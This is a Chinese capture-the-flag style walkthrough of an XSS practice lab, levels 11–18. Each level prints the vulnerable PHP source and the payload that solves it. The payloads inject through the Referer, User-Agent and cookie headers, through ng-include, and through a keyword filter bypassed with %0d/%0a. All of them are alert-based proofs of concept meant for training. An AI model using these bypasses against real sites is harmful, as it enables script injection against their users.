目录
leval11
看源码
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
根据HTTP_REFERER 参数想到了HTTP头,那么我们可以在请求头进行XSS注入,这一关很显然注入点在Referer,那么我们可以使用burpsuite和火狐插件hackbar,在这一关中直接利用burpsuite抓包修改Referer,
"οnclick="alert()" type="text
leval12
看源码
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
这里是user-agent,那就抓包修改
"οnclick="alert(1)" type="text
leval13
看源码
<?php
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
跟前面几道题一样,这次是在cookie改
"οnclick=alert(1) type="text
leval15
看源码
<?php
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>
ng-include有包含文件的意思,也就相当于php里面的include
src地址无法访问
先将其换成国内可以访问的地址:
https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js
既然这里可以包含html文件,那么也就可以包含之前有过xss漏洞的源文件
?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'
<img>图片url获取失败时通过onerror显示默认图片
特别值得注意的几点如下:
1.ng-include,如果单纯指定地址,必须要加引号
2.ng-include,加载外部html,script标签中的内容不执行
3.ng-include,加载外部html中含有style标签样式可以识别
leval16
看源码
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo "<center>".$str5."</center>";
?>
<?php
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>
script / 大小写都被绕过了,我们可以用%0d,%0a代替
<img%0Dsrc=1%0Dοnerrοr=alert(1)>
<iframe%0asrc=x%0dοnmοuseοver=alert`1`>
</iframe> <svg%0aοnlοad=alert`1`></svg>
leval17
看源码
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
arg01=1&arg02= οnmοuseοver=alert(1)
leval18
看源码
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
和17题一样